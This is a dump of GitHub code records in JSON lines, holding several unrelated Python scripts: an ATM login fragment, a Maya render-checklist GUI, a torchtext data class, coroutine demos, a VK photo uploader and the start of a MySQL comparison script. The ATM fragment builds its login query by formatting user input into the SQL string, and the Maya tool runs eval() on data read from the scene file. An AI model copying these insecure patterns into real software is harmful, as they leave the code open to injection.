c.fetchall()==[]:\n print('Mohon Maaf, Username dan atau PIN salah')\n print('Jika belum memiliki akun, mohon hubungi staff kami')\n exit()\n else:\n print('Anda berhasil Login')\n c.execute(\"SELECT * FROM data_pelanggan WHERE username='{}'\"\n \"and pin='{}'\".format(masukkan_username, masukkan_pin))\n login_user = c.fetchall()\n for login_user in login_user:\n pengguna_saat_ini = login_user[0]\n pin_saat_ini = login_user[1]\n saldo_saat_ini = login_user[2]\n","repo_name":"bryanbernigen/ITBSem1","sub_path":"Python/ATM/cek_pengguna.py","file_name":"cek_pengguna.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"22854564440","text":"def count1(num):\n l = len(num)\n if l == 0:\n return 0\n first = int(num[0])\n if l == 1 and first == 0:\n return 0\n if l == 1 and first == 1:\n return 1\n num_in_first = 0\n if first > 1:\n num_in_first = int(10 ** (l - 1))\n elif first == 1:\n num_in_first = int(num[1:]) + 1\n\n num_in_other = (first) * (l - 1) * int(10 ** (l - 2))\n return num_in_first+num_in_other+count1(num[1:])\n\n\nif __name__ == \"__main__\":\n print(count1('21345'))\n","repo_name":"fengjiachen/leetcode","sub_path":"append/count_1_in_digit.py","file_name":"count_1_in_digit.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36162174663","text":"# -*- coding: utf-8 -*-\nimport maya.cmds as cmds\nimport maya.mel as mel\nZWFGlobalbuttonResultCJ={}\nZWFGlobalbuttonMiddCJ={}\nZWFGlobalbuttonResultJS={}\nZWFGlobalbuttonMiddJS={}\nclass CheckRenderSeting(object):\n\t'UI class'\n\tuiName=''\n\tdef __init__(self):\n\t\tfileInfoDateCJ=cmds.fileInfo('zwfRenderSetingButtonColorDatasCJ',q=True)\n\t\tfileInfoDateJS=cmds.fileInfo('zwfRenderSetingButtonColorDatasJS',q=True)\n\t\tif len(fileInfoDateCJ):\n\t\t\tself.zwfRenderSetingButtonColorDatasCJ=eval(fileInfoDateCJ[0])\n\t\telse:\n\t\t\tself.zwfRenderSetingButtonColorDatasCJ=[]\n\t\tif len(fileInfoDateJS):\n\t\t\tself.zwfRenderSetingButtonColorDatasJS=eval(fileInfoDateJS[0])\n\t\telse:\n\t\t\tself.zwfRenderSetingButtonColorDatasJS=[]\n\tdef setUiName(self,uiName):\n\t\t'Set a name of window'\n\t\tself.uiName=uiName\n\tdef creatUi(self):\n\t\t'UI core functions'\n\t\tif cmds.window(self.uiName,ex=1):\n\t\t\tcmds.deleteUI(self.uiName)\n\t\tcmds.window(self.uiName,t=u'提交渲染前检查工具',wh=(550,400))\n\t\tself.maiform=cmds.formLayout(numberOfDivisions=100)\n\n\t\tHelp_b=cmds.button(l=u'帮助',h=30)\n\t\tclose_b=cmds.button(l=u'关闭',h=30,c=self.closeWindow)\n\t\tpaneL=cmds.paneLayout( configuration='vertical2' ,ps=[1,60,40])\n\n\t\tself.tabs = cmds.tabLayout(innerMarginWidth=5, innerMarginHeight=5)\n\n\t\tself.button_listScr_CJ=cmds.scrollLayout(vst=1,hst=0,cr=1)\n\t\tframeCJ=cmds.frameLayout(label=u'场景提交渲染前执行按钮', borderStyle='etchedIn')\n\t\tbb=CreateButton()\n\t\tbb.create_button(True)\n\n\t\tcmds.setParent(self.tabs)\n\t\tself.button_listScr_JS=cmds.scrollLayout(vst=1,hst=0,cr=1)\n\t\tframeJS=cmds.frameLayout(label=u'角色提交渲染前执行按钮', borderStyle='etchedIn')\n\t\tcc=CreateButton()\n\t\tcc.create_button(False)\n\n\t\tcmds.tabLayout(self.tabs, edit=True, tabLabel=((self.button_listScr_CJ, u'场景'),(self.button_listScr_JS, u'角色')))\n\t\t\n\t\tcmds.setParent(paneL)\n\t\tself.help_listScr =cmds.scrollLayout(vst=1,hst=0,cr=1)\n\t\tcmds.frameLayout('ann_ts_frame',label=u'按钮提示', borderStyle='etchedIn')\n\n\t\tcmds.formLayout(self.maiform,e=True,\n\t\t\t\t\t\t\t\taf=[(Help_b,'left',5),(Help_b,'bottom',5),\n\t\t\t\t\t\t\t\t\t(close_b,'right',5),(close_b,'bottom',5),\n\t\t\t\t\t\t\t\t\t(paneL,'left',5),(paneL,'right',5),(paneL,'top',5)],\n\t\t\t\t\t\t\t\tac=[(paneL,'bottom',5,Help_b),(Help_b,'right',5,close_b)],\n\t\t\t\t\t\t\t\tap=[(close_b,'left',0,50)]\n\t\t\t\t\t\t\t\t)\n\t\t#cmds.tabLayout(self.tabs, edit=True, tabLabel=((frameCJ, u'场景'), (frameCJ, u'角色')))\n\t\tcmds.window(self.uiName,e=True,wh=(730,400))\n\t\tcmds.showWindow(self.uiName)\n\tdef closeWindow(self,*args):\n\t\t'delete UI'\n\t\tcmds.deleteUI(self.uiName)\nclass ZhuButton(object):\n\t'Create button class'\n\tlabel=''\n\tdef __init__(self,isCJ):\n\t\tself.buttonlabel=''\n\t\tself.isCJ=isCJ\n\tdef saveRenderSetingButtonColorControlDatasCJ(self,baochuanwenjianCJ):\n\t\tcmds.fileInfo('zwfRenderSetingButtonColorDatasCJ',str(baochuanwenjianCJ))\n\n\tdef saveRenderSetingButtonColorControlDatasJS(self,baochuanwenjianJS):\n\t\tcmds.fileInfo('zwfRenderSetingButtonColorDatasJS',str(baochuanwenjianJS))\n\n\tdef setname(self,label):\n\t\t'set a name of button'\n\t\tself.labelname=label\n\tdef createButton(self):\n\t\t'create button core function'\n\t\tanform=cmds.formLayout(numberOfDivisions=100)\n\t\tself.button=cmds.button(l=self.labelname)\n\t\tself.button_labelname()\n\t\tif self.isCJ:\n\t\t\tZWFGlobalbuttonResultCJ[self.button]=[]\n\t\t\tfor each in ZWFGlobalbuttonResultCJ:\n\t\t\t\tZWFGlobalbuttonResultCJ[each].append(self.button)\n\n\t\t\tZWFGlobalbuttonMiddCJ[self.buttonlabel]=[]\n\t\t\tfor single in ZWFGlobalbuttonMiddCJ:\n\t\t\t\tZWFGlobalbuttonMiddCJ[single].append(self.buttonlabel)\n\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif self.buttonlabel in bb.zwfRenderSetingButtonColorDatasCJ:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0,1,0])\n\t\t\telse:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0.51,0.51,0.51])\n\t\telse:\n\t\t\tZWFGlobalbuttonResultJS[self.button]=[]\n\t\t\tfor each in ZWFGlobalbuttonResultJS:\n\t\t\t\tZWFGlobalbuttonResultJS[each].append(self.button)\n\n\t\t\tZWFGlobalbuttonMiddJS[self.buttonlabel]=[]\n\t\t\tfor single in ZWFGlobalbuttonMiddJS:\n\t\t\t\tZWFGlobalbuttonMiddJS[single].append(self.buttonlabel)\n\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif self.buttonlabel in bb.zwfRenderSetingButtonColorDatasJS:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0,1,0])\n\t\t\telse:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0.51,0.51,0.51])\n\n\t\tcmds.button(self.button,e=True,c=self.setbutton_bgc_g)\n\t\tself.ht_b=cmds.button(l='H&&T',c=self.button_ts,bgc=[0.51,0.51,0.51])\n\t\tself.r_b=cmds.button(l='R',c=self.setbutton_bgc_l,bgc=[0.51,0.51,0.51])\n\t\tcmds.formLayout(anform,e=True,\n\t\t\t\t\t\t\t\taf=[(self.button,'left',5),(self.button,'top',0),\n\t\t\t\t\t\t\t\t\t(self.r_b,'right',5),(self.r_b,'top',0),\n\t\t\t\t\t\t\t\t\t(self.ht_b,'top',0)],\n\t\t\t\t\t\t\t\tac=[(self.ht_b,'left',1,self.button),(self.ht_b,'right',1,self.r_b)],\n\t\t\t\t\t\t\t\tap=[(self.button,'right',0,70),(self.r_b,'left',0,85)]\n\t\t\t\t\t\t\t\t)\n\tdef setbutton_bgc_g(self,*args):\n\t\tcmds.button(self.button,e=True,bgc=[0,1,0])\n\t\tbb=CheckRenderSeting()\n\t\tif self.isCJ:\n\t\t\tif self.buttonlabel not in bb.zwfRenderSetingButtonColorDatasCJ:\n\t\t\t\tbb.zwfRenderSetingButtonColorDatasCJ.append(self.buttonlabel)\n\t\t\tself.saveRenderSetingButtonColorControlDatasCJ(bb.zwfRenderSetingButtonColorDatasCJ)\n\t\telse:\n\t\t\tif self.buttonlabel not in bb.zwfRenderSetingButtonColorDatasJS:\n\t\t\t\tbb.zwfRenderSetingButtonColorDatasJS.append(self.buttonlabel)\n\t\t\tself.saveRenderSetingButtonColorControlDatasJS(bb.zwfRenderSetingButtonColorDatasJS)\n\n\tdef setbutton_bgc_l(self,*args):\n\t\tif self.isCJ:\n\t\t\tfor single in ZWFGlobalbuttonResultCJ[self.button]:\n\t\t\t\tcmds.button([single],e=True,bgc=[0.51,0.51,0.51])\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif len(bb.zwfRenderSetingButtonColorDatasCJ):\n\t\t\t\tfor each in ZWFGlobalbuttonMiddCJ[self.buttonlabel]:\n\t\t\t\t\tif each in bb.zwfRenderSetingButtonColorDatasCJ:\n\t\t\t\t\t\tbb.zwfRenderSetingButtonColorDatasCJ=self.removeItem(bb.zwfRenderSetingButtonColorDatasCJ,each)\n\t\t\t\tself.saveRenderSetingButtonColorControlDatasCJ(bb.zwfRenderSetingButtonColorDatasCJ)\n\t\telse:\n\t\t\tfor single in ZWFGlobalbuttonResultJS[self.button]:\n\t\t\t\tcmds.button([single],e=True,bgc=[0.51,0.51,0.51])\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif len(bb.zwfRenderSetingButtonColorDatasJS):\n\t\t\t\tfor each in ZWFGlobalbuttonMiddJS[self.buttonlabel]:\n\t\t\t\t\tif each in bb.zwfRenderSetingButtonColorDatasJS:\n\t\t\t\t\t\tbb.zwfRenderSetingButtonColorDatasJS=self.removeItem(bb.zwfRenderSetingButtonColorDatasJS,each)\n\t\t\t\tself.saveRenderSetingButtonColorControlDatasJS(bb.zwfRenderSetingButtonColorDatasJS)\n\tdef removeItem(self,oldlist,reItem):\n\t\tmidlist=[]\n\t\tfor i in oldlist:\n\t\t\tif i!=reItem:\n\t\t\t\tmidlist.append(i)\n\t\treturn midlist \n\n\tdef button_labelname(self):\n\t\tif self.labelname==u'搜索是否带有“_rig_slice.ma”关键字':\n\t\t\tself.buttonlabel='caizhimoxing'\n\t\tif self.labelname==u'制作cache文件':\n\t\t\tself.buttonlabel='zhizoudianhuanchuang'\n\t\telif self.labelname==u'切换到材质模型':\n\t\t\tself.buttonlabel='wenjiandianhuanchuan'\n\t\telif self.labelname==u'确认主光方向':\n\t\t\tself.buttonlabel='zhuguangfangxiang'\n\t\telif self.labelname==u'保存角色交互的场景文件':\n\t\t\tself.buttonlabel='baocjuesejiaohuchangjing'\n\t\telif self.labelname==u'设置assetID,并检查':\n\t\t\tself.buttonlabel='shezhiID'\n\t\telif self.labelname==u'导入场景进行优化':\n\t\t\tself.buttonlabel='daoruyouhuachangjing'\n\t\telif self.labelname==u'优化场景':\n\t\t\tself.buttonlabel='youhuachangjing'\n\t\telif self.labelname==u'清除灯光连接':\n\t\t\tself.buttonlabel='deletedengguanglianjie'\n\t\telif self.labelname==u'拷贝贴图至本地':\n\t\t\tself.buttonlabel='tietudaobendi'\n\t\telif self.labelname==u'导出场景影响角色物体(Occ,shadow)':\n\t\t\tself.buttonlabel='daochuchangjingos'\n\t\telif self.labelname==u'导出场景影响角色物体(mask)':\n\t\t\tself.buttonlabel='daochuchangjingmask'\n\t\telif self.labelname==u'导入场景影响角色物体(Occ,shadow)':\n\t\t\tself.buttonlabel='daoruchangjingos'\n\t\telif self.labelname==u'导入场景影响角色物体(mask)':\n\t\t\tself.buttonlabel='daoruchangjingmask'\n\t\telif self.labelname==u'优化无用的材质和材质球':\n\t\t\tself.buttonlabel='youhuamap'\n\t\telif self.labelname==u'优化sssMap':\n\t\t\tself.buttonlabel='youhuasssmap'\n\t\telif self.labelname==u'贴图精度优化':\n\t\t\tself.buttonlabel='daoruHDR'\n\t\telif self.labelname==u'建立HDR环境球':\n\t\t\tself.buttonlabel='jianliHDR'\n\t\telif self.labelname==u'导入相应灯光rig(CJ)':\n\t\t\tself.buttonlabel='daorudengguangrigcj'\n\t\telif self.labelname==u'导入相应灯光rig(JS)':\n\t\t\tself.buttonlabel='daorudengguangrigjs'\n\t\telif self.labelname==u'设置摄像机的远近裁切平面':\n\t\t\tself.buttonlabel='sxjqaiqiu'\n\t\telif self.labelname==u'灯光使用shadowMap(MR)':\n\t\t\tself.buttonlabel='shadowmap'\n\t\telif self.labelname==u'分层设置':\n\t\t\tself.buttonlabel='fengcengshizhi'\n\t\telif self.labelname==u'细分代理':\n\t\t\tself.buttonlabel='xifendaili'\n\t\telif self.labelname==u'另存场景':\n\t\t\tself.buttonlabel='baochunchuangjing'\n\t\telif self.labelname==u'场景渲染测试':\n\t\t\tself.buttonlabel='xuanranceshi'\n\t\telif self.labelname==u'渲染连续5帧(1280尺寸)':\n\t\t\tself.buttonlabel='xuanranwuzhen'\n\t\telif self.labelname==u'文件贴图过滤':\n\t\t\tself.buttonlabel='wenjianguolu'\n\t\telif self.labelname==u'请提高阴影品质':\n\t\t\tself.buttonlabel='yingyingpz'\n\t\telif self.labelname==u'修改原始模型':\n\t\t\tself.buttonlabel='xgyuanshimoxing'\n\t\telif self.labelname==u'贴图路径指回服务器':\n\t\t\tself.buttonlabel='tietiedaofuwuqi'\n\t\telif self.labelname==u'指定渲染前需要执行的mel':\n\t\t\tself.buttonlabel='xuanranmel'\n\t\telif self.labelname==u'另存Occ文件':\n\t\t\tself.buttonlabel='baochuanoccwenjian'\n\t\telif self.labelname==u'文件提交服务器':\n\t\t\tself.buttonlabel='wenjiantijiaofuwuqi'\n\t\telif self.labelname==u'deadline提交渲染':\n\t\t\tself.buttonlabel='deadlinetijiaoxuanran'\n\n\tdef button_h(self):\n\t\tif self.labelname==u'搜索是否带有“_rig_slice.ma”关键字':\n\t\t\th=u'''\n使用文本工具(ultraedit://server-epic01/Software/PC_Softwares/other_Softwares/book/ultraEdit)打开文件,搜索是否带有“_rig_slice.ma”关键字,如果有,记录下来要求动画切换成带绑定高模文件。(遇到slice文件不做cache要直接做灯光的,操作步骤为灯光制作流程文档注3)。\n'''\n\t\t\treturn h\n\t\t\n\t\tif self.labelname==u'制作cache文件':\n\t\t\th=u'''\n第一步通过后,直接提交cache农场,制作cache文件。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'切换到材质模型':\n\t\t\th=u'''\n打开cache文件,切换好带材质模型。\n'''\n\t\t\timport switchShadingModel as SSM\n\t\t\tSSM.main()\n\t\t\treturn h\n\n\t\telif self.labelname==u'确认主光方向':\n\t\t\th=u'''\n确认主光方向,制作方式(与组长,总监确认)。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'保存角色交互的场景文件':\n\t\t\th=u'''\n打开作为角色交互的场景文件,赋予默认材质,去除细分节点,清除灯光连接,打组命名,保存。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'设置assetID,并检查':\n\t\t\th=u'''\n请您设置assetID,并检查(必须在Reference时做,Reference可能会在以后的步骤中被破坏)。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入场景进行优化':\n\t\t\th=u'''\n请您考虑是否导入场景进行优化。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'优化场景':\n\t\t\th=u'''\n请您根据镜头优化场景,删除看不到无影响的物体。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'清除灯光连接':\n\t\t\th=u'''\n请清除灯光连接。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'拷贝贴图至本地':\n\t\t\th=u'''\n使用指定工具拷贝贴图至本地路径。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导出场景影响角色物体(Occ,shadow)':\n\t\t\th=u'''\n根据动画layout及灯光效果图,判断对角色有阴影有遮罩或Occ影响的物体。选择他们另存一个文件供角色制作交互影响时使用(可以自己做简化的模型)\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导出场景影响角色物体(mask)':\n\t\t\th=u'''\n根据动画layout及灯光效果图,以及场景做好的分层关系,判断角色和场景之间的遮挡关系,导出相应的模型作为场景对角色的遮挡影响,如果和之前做做阴影和Occ的物体有重叠,请自行考虑是否使用同一文件\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入场景影响角色物体(Occ,shadow)':\n\t\t\th=u'''\n根据镜头导入事先优化的场景,作为场景对角色的 Occ,shadow 的影响。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入场景影响角色物体(mask)':\n\t\t\th=u'''\n根据镜头导入事先优化的场景,作为场景对角色的 遮挡的影响。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'优化无用的材质和材质球':\n\t\t\th=u'''\n优化无用的材质和材质球。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'优化sssMap':\n\t\t\th=u'''\n优化sssMap。\n'''\n\t\t\timport checkShadingModel as CSM\n\t\t\tCSM.checkShadingModel()\n\t\t\treturn h\n\n\t\telif self.labelname==u'贴图精度优化':\n\t\t\th=u'''\n贴图精度优化。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'建立HDR环境球':\n\t\t\th=u'''\n建立HDR环境球,导入对应场次HDR,取消环境球主渲染。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入相应灯光rig(CJ)':\n\t\t\th=u'''\n导入相应灯光rig, 设置直接光照。注意在摄像机前约束一个只开高光的灯并链接所有眼球。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入相应灯光rig(JS)':\n\t\t\th=u'''\n导入相应灯光rig(缺少预设文件,和路径设置), 设置直接光照。注意在摄像机前约束一个只开高光的灯并链接所有眼球。\n'''\n\t\t\treturn h\n\n\n\t\telif self.labelname==u'设置摄像机的远近裁切平面':\n\t\t\th=u'''\n设置摄像机的远近裁切平面(分别是摄像机的NearClipPlane,FarClipPlane值)。MR它只读设置的数值,不自动。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'灯光使用shadowMap(MR)':\n\t\t\th=u'''\n对没有场景物件移动的,灯光使用shadowMap(MR)的,注意设置偏移值(一般不用\n设置)自阴影,和采样值;对于使用 Raytrace Shadow 的要注意设置灯光阴影半角,\n阴影采样射线数,防止噪点闪烁。并且请注意渲染效率,减少使用阴影。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'分层设置':\n\t\t\th=u'''\n设置分层(分层工具需要注意的点:阴影,反射等关联的设置,分离灯光,Z,ID等\n不要忘记设置,并注意减少 Layer Override 。由于场景灯光种类繁多,分离灯光\n请选择性使用提高渲染效率)。设置阴影,反射,遮罩(注意不要忘记设置之前导\n入的作为角色影响的场景文件)等关联。使用Pass工具全局设置 ,\n使用Global Midfy Shaders来设置AO,Z,ID等(Z,ID必须根据场景场景设置)。\n详细使用请参看帮助。\n'''\n\t\t\timport Output_Pass_Tool_new as OPTN\n\t\t\tOPTN.call_OutputRenderPasses()\n\t\t\treturn h\n\n\t\telif self.labelname==u'细分代理':\n\t\t\th=u'''\n细分优化(需要模型提交时设置好smoothID,代理为代理,有问题的模型使用smooth)。\n'''\n\t\t\timport Addmentalraysubdivisionproxy as addMSP\n\t\t\taddMSP.call_Addmsp()\n\t\t\treturn h\n\n\t\telif self.labelname==u'另存场景':\n\t\t\th=u'''\n另存场景,设置GI场景(渲染面板预制mel,注意GI是32位图片。并且mi_blinn并不支持任何GI。),和Occ。其实occ最好分开做,因为会对材质进行 Override 大大影响效率。后面有一步制作occ,当时因为场景较小所以一起做了。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'场景渲染测试':\n\t\t\th=u'''\n场景渲染测试(渲染面板设置mel),如镜头运动,出多角度全尺寸合成图片。制作一张类似下图的HDR作为角色反射,灯光,GI的参考(需要等正常镜头QC通过,方能制作)。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'渲染连续5帧(1280尺寸)':\n\t\t\th=u'''\n成品质量1280尺寸,检测连续5帧(请选择运动镜头),用于检测是否有贴图,模型缝隙,阴影的闪烁。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'文件贴图过滤':\n\t\t\th=u'''\n如有贴图闪烁,或者感觉太模糊需要更好的过滤方式保证近景贴图清晰度的,改变贴图的过滤方式为MR的椭圆过滤(脚本更改)。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'请提高阴影品质':\n\t\t\th=u'''\n如有阴影闪烁请提高阴影品质。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'修改原始模型':\n\t\t\th=u'''\n如有模型闪烁,请适当修改原始模型,保证后续镜头不受其影响。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'贴图路径指回服务器':\n\t\t\th=u'''\n所有贴图路径指回服务器。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'指定渲染前需要执行的mel':\n\t\t\th=u'''\n指定渲染前需要执行的mel。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'另存Occ文件':\n\t\t\th=u'''\n另存Occ文件,删除所有pass。在masterLayer,把mi_blinn转为lambert,转为occ材质(mel),使用HyperShader的\"Delete Unueses Nodes\"命令删除无用材质,执行Occ渲染预设,保存文件。\n'''\n\t\t\timport Shader_Tool as ST\n\t\t\tST.shader_ui()\n\t\t\treturn h\n\n\t\telif self.labelname==u'文件提交服务器':\n\t\t\th=u'''\n把该文件提交到服务器上面。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'deadline提交渲染':\n\t\t\th=u'''\ndeadline提交渲染。\n'''\n\t\t\treturn h\n\n\tdef button_ts(self,*args):\n\t\tif cmds.columnLayout('RenderSeting_H_col',ex=True):\n\t\t\tcmds.deleteUI('RenderSeting_H_col')\n\t\tcmds.columnLayout('RenderSeting_H_col',adj=True,p='ann_ts_frame')\n\t\tcmds.scrollField(ww=True,editable=False,text=self.button_h(),h=321,p='RenderSeting_H_col')\n#\t\tcmds.text(l=self.button_h(),al='left')\n\nclass CreateButton(object):\n\tdef create_button(self,is_CJ):\n\t\tif is_CJ:\n\t\t\tlabels=[u'搜索是否带有“_rig_slice.ma”关键字',u'制作cache文件',u'切换到材质模型',u'确认主光方向',u'设置assetID,并检查',\n\t\t\t\t\tu'导入场景进行优化',u'优化场景',u'清除灯光连接',u'导出场景影响角色物体(Occ,shadow)',u'导出场景影响角色物体(mask)',\n\t\t\t\t\tu'优化无用的材质和材质球',u'拷贝贴图至本地',u'贴图精度优化',u'导入相应灯光rig(CJ)',u'设置摄像机的远近裁切平面',\n\t\t\t\t\tu'灯光使用shadowMap(MR)',u'分层设置',u'细分代理',u'另存场景',u'场景渲染测试',u'渲染连续5帧(1280尺寸)',\n\t\t\t\t\tu'文件贴图过滤',u'请提高阴影品质',u'修改原始模型',u'贴图路径指回服务器',u'指定渲染前需要执行的mel',\n\t\t\t\t\tu'另存Occ文件',u'文件提交服务器',u'deadline提交渲染']\n\t\telse:\n\t\t\tlabels=[u'搜索是否带有“_rig_slice.ma”关键字',u'制作cache文件',u'切换到材质模型',u'确认主光方向',u'保存角色交互的场景文件',u'设置assetID,并检查',\n\t\t\t\t\tu'导入场景进行优化',u'清除灯光连接',u'拷贝贴图至本地',u'导入场景影响角色物体(Occ,shadow)',u'导入场景影响角色物体(mask)',\n\t\t\t\t\tu'优化sssMap',u'贴图精度优化',u'建立HDR环境球',u'导入相应灯光rig(JS)',u'设置摄像机的远近裁切平面',\n\t\t\t\t\tu'灯光使用shadowMap(MR)',u'分层设置',u'细分代理',u'另存场景',u'场景渲染测试',u'渲染连续5帧(1280尺寸)',\n\t\t\t\t\tu'文件贴图过滤',u'请提高阴影品质',u'修改原始模型',u'贴图路径指回服务器',u'指定渲染前需要执行的mel',\n\t\t\t\t\tu'另存Occ文件',u'文件提交服务器',u'deadline提交渲染']\n\t\tan_col=cmds.columnLayout(adj=True,rs=2)\n\t\tfor label in labels:\n\t\t\tcmds.setParent(an_col)\n\t\t\tbb=ZhuButton(is_CJ)\n\t\t\tbb.setname(label)\n\t\t\tbb.createButton()\n\n\n\ndef checkR():\n\taa=CheckRenderSeting()\n\taa.setUiName('checkRenderseting_win')\n\taa.creatUi()\nif __name__=='__main__':\n\tcheckR()","repo_name":"zhengweifu/zhengweifu.github.io","sub_path":"assets/images/threeToolDev/lighting_render/CheckRenderSeting.py","file_name":"CheckRenderSeting.py","file_ext":"py","file_size_in_byte":19620,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21812541829","text":"import json\n\nimport six\n\n\nclass Example(object):\n \"\"\"Defines a single training or test example.\n\n Stores each column of the example as an attribute.\n \"\"\"\n\n @classmethod\n def fromJSON(cls, data, fields):\n return cls.fromdict(json.loads(data), fields)\n\n @classmethod\n def fromdict(cls, data, fields):\n ex = cls()\n for key, vals in fields.items():\n if key not in data:\n raise ValueError(\"Specified key {} was not found in \"\n \"the input data\".format(key))\n if vals is not None:\n if not isinstance(vals, list):\n vals = [vals]\n for val in vals:\n name, field = val\n setattr(ex, name, field.preprocess(data[key]))\n return ex\n\n @classmethod\n def fromCSV(cls, data, fields, field_to_index=None):\n if field_to_index is None:\n return cls.fromlist(data, fields)\n else:\n assert(isinstance(fields, dict))\n data_dict = {f: data[idx] for f, idx in field_to_index.items()}\n return cls.fromdict(data_dict, fields)\n\n @classmethod\n def fromlist(cls, data, fields):\n ex = cls()\n for (name, field), val in zip(fields, data):\n if field is not None:\n if isinstance(val, six.string_types):\n val = val.rstrip('\\n')\n # Handle field tuples\n if isinstance(name, tuple):\n for n, f in zip(name, field):\n setattr(ex, n, f.preprocess(val))\n else:\n setattr(ex, name, field.preprocess(val))\n return ex\n\n @classmethod\n def fromtree(cls, data, fields, subtrees=False):\n try:\n from nltk.tree import Tree\n except ImportError:\n print(\"Please install NLTK. \"\n \"See the docs at http://nltk.org for more information.\")\n raise\n tree = Tree.fromstring(data)\n if subtrees:\n return [cls.fromlist(\n [' '.join(t.leaves()), t.label()], fields) for t in tree.subtrees()]\n return cls.fromlist([' '.join(tree.leaves()), tree.label()], fields)\n","repo_name":"Sudy/coling2018","sub_path":"torchtext/data/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"60"} +{"seq_id":"19936280276","text":"def number_coroutine():\n while True:\n x = (yield)\n print(x, end=' ')\n\n\nco = number_coroutine()\nnext(co)\n\nfor i in range(20):\n co.send(i)\n\nco.close() # 코루틴 종료\n\n\ndef number_coroutine():\n # NOTE: coroutine with error\n try:\n while True:\n x = (yield)\n print(x, end=' ')\n except GeneratorExit: # 코루틴이 종료 될 때 GeneratorExit 예외 발생\n print()\n print('코루틴 종료')\n\n\nco = number_coroutine()\nnext(co)\n\nfor i in range(20):\n co.send(i)\n\nco.close()\n\n\ndef sum_coroutine():\n # couroutine with custom error\n try:\n total = 0\n while True:\n x = (yield)\n total += x\n except RuntimeError as e:\n print(e)\n yield total # 코루틴 바깥으로 값 전달\n\n\nco = sum_coroutine()\nnext(co)\n\nfor i in range(20):\n co.send(i)\n\nprint(co.throw(RuntimeError, '예외로 코루틴 끝내기')) # 190\n\"\"\"\n예외로 코루틴 끝내기\n190\n\"\"\"\n","repo_name":"wonjinsin/TIL","sub_path":"python/코딩 도장/41.3 coroutine close.py","file_name":"41.3 coroutine close.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21161478433","text":"import vk\nimport settings\nimport requests\n\n\ndef upload_photo_to_album(path_of_file):\n\n session = vk.AuthSession(access_token=settings.user_access_token)\n vk_api = vk.API(session, v=settings.vk_api_version)\n\n upload_url = vk_api.photos.getUploadServer(group_id=settings.group_for_photos_id,\n album_id=settings.album_id)['upload_url']\n\n request = requests.post(upload_url,\n files={'photo': open(path_of_file, \"rb\")})\n\n photo = vk_api.photos.save(album_id='255140841',\n group_id=settings.group_for_photos_id,\n server=request.json()['server'],\n photos_list=request.json()['photos_list'],\n hash=request.json()['hash'])[0]\n photo_id = photo['id']\n\n photo_parameters = 'photo-' + settings.group_for_photos_id + '_' + str(photo_id)\n return photo_parameters\n","repo_name":"alexvi88/vk_posting_photos","sub_path":"uploading_photo_to_album.py","file_name":"uploading_photo_to_album.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"41716844350","text":"# from mysqlExecute import MysqlExecute\n# from myDocx import MyDocx\nfrom compareData import MysqlInfo\nfrom compareData import DocxInfo\nfrom configuration import Configuration\nfrom logService import LogService\n\nimport pymysql\nimport myExcel\nimport time\n\n\nlogService = LogService()\nCONFIG = Configuration()\ndoc_config = CONFIG.doc_config_dict\ncompare_config = CONFIG.compare_config_dict\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check(_doc_table_info, _database_table_info):\n if _database_table_info is None:\n return False\n _check_res = list()\n err_map = dict()\n err_map['table'] = dict()\n err_map['params'] = dict()\n _check_flag = False\n database_params_info = _database_table_info['param_info']\n doc_params_info = _doc_table_info['params']\n for param_name in database_params_info:\n if param_name in doc_params_info.keys():\n type_flag = doc_params_info[param_name]['type'] == database_params_info[param_name]['type']\n key_flag = check_only(_database_param_info=database_params_info[param_name], 